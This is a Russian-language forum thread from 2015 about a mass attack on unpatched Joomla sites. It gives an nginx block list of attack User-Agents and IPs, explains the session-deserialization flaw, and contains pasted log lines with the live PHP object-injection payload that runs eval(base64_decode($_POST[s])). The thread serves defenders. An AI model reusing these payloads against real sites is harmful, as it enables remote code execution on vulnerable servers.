https://opennet.ru/openforum/vsluhforumID3/105980.html Продолжается [[https://www.opennet.ru/opennews/art.shtml?num=43521 массовая атака]] на сайты под управлением Joomla. К сожалению на базе данной CMS в сети много сайтов, администраторы которых не спешат устанавливать обновления. На системах хостинга можно попытаться блокировать типовую автоматизированную атаку централизованно, на стороне сервера.<br><br>Для блокировки можно заблокировать обращение c User Agent "JDatabaseDriverMysql" и "O:", а также запретить обращение c IP-адресов, с которых зафиксировано проведение атаки.<br><br>Пример для nginx:<br><br> http {<br> map $http_user_agent $blocked_ua {<br> ~(?i)JDatabaseDriverMysql 1;<br> ~(?i)O: 1;<br> default 0;<br> }<br> map $remote_addr $blocked_ip {<br> 74.3.170.33 1;<br> 146.0.72.83 1;<br> 194.28.174.106 1;<br> default 0;<br> }<br> server {<br> listen 80;<br> if ($blocked_ua) { return 403; }<br> if ($blocked_ip) { return 403; }<br> # ...<br> }<br> }<br><br><br>Приме https://opennet.ru/openforum/vsluhforumID3/105980.html#17 Wed, 30 Dec 2015 17:02:39 GMT произвольный код исполняется... вебшеллы не залили, лишних пользователей в джумлу не добавили - уже хорошо...<br><br>====<br>В коде обработчика сессий Joomla пристутствует уязвимость, которая позволяет осуществить внедрение строки в синтаксис сериализованной сессии через HTTP-заголовки User-Agent и X-Forwarded-For. Эксплоит использует особенность MySQL при обработке utf8-символов из диапазона U+010000 &#8212; U+10FFFF. При вставке строки, в конце которой присутствует такой символ, MySQL обрежет данные. Это позволяет сформировать и записать в таблицу сессий строку, в которой присутствуют пользовательские PHP-объекты, без нарушения синтаксиса. В ходе десериализации сессии атакующего вызываются деструкторы классов Joomla, что ведет к выполнению произвольного кода&#8203;<br>====<br> https://opennet.ru/openforum/vsluhforumID3/105980.html#16 Tue, 29 Dec 2015 12:46:14 GMT Оналогично, дружище. Всё проверил, ничего не нашёл. Что делает эта строка, кто-нибудь может описать?<br> https://opennet.ru/openforum/vsluhforumID3/105980.html#15 Sat, 26 Dec 2015 23:08:28 GMT # ifdown eth0<br>sh: ifdown: Command not found <br> https://opennet.ru/openforum/vsluhforumID3/105980.html#14 Thu, 24 Dec 2015 19:10:09 GMT # halt<br> https://opennet.ru/openforum/vsluhforumID3/105980.html#13 Tue, 22 Dec 2015 05:49:36 GMT а всё таки, гуру просветлённые с недюжинным ч.ю., есть ответ? в логах следы есть, файлов изменённых в папке сайта нет. куда ещё копать, где проверить?<br> https://opennet.ru/openforum/vsluhforumID3/105980.html#12 Mon, 21 Dec 2015 19:58:08 GMT &gt;ifconfig eth0 down;<br><br>ifdown eth0<br> https://opennet.ru/openforum/vsluhforumID3/105980.html#11 Mon, 21 Dec 2015 19:54:40 GMT &gt;ifconfig eth0 down; <br><br>Для параноидального режима<br><br>iptables -P INPUT DROP<br><br>poweroff<br> https://opennet.ru/openforum/vsluhforumID3/105980.html#10 Mon, 21 Dec 2015 16:38:03 GMT &gt; весь интернет не заблокируешь<br><br>ifconfig eth0 down; <br> <br> https://opennet.ru/openforum/vsluhforumID3/105980.html#9 Fri, 18 Dec 2015 10:58:07 GMT строки в логе следующие:<br>\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:57:\x22eval(base64_decode($_POST[s]));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD"<br>и<br>\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:102:\x22eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST[s]))))));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:1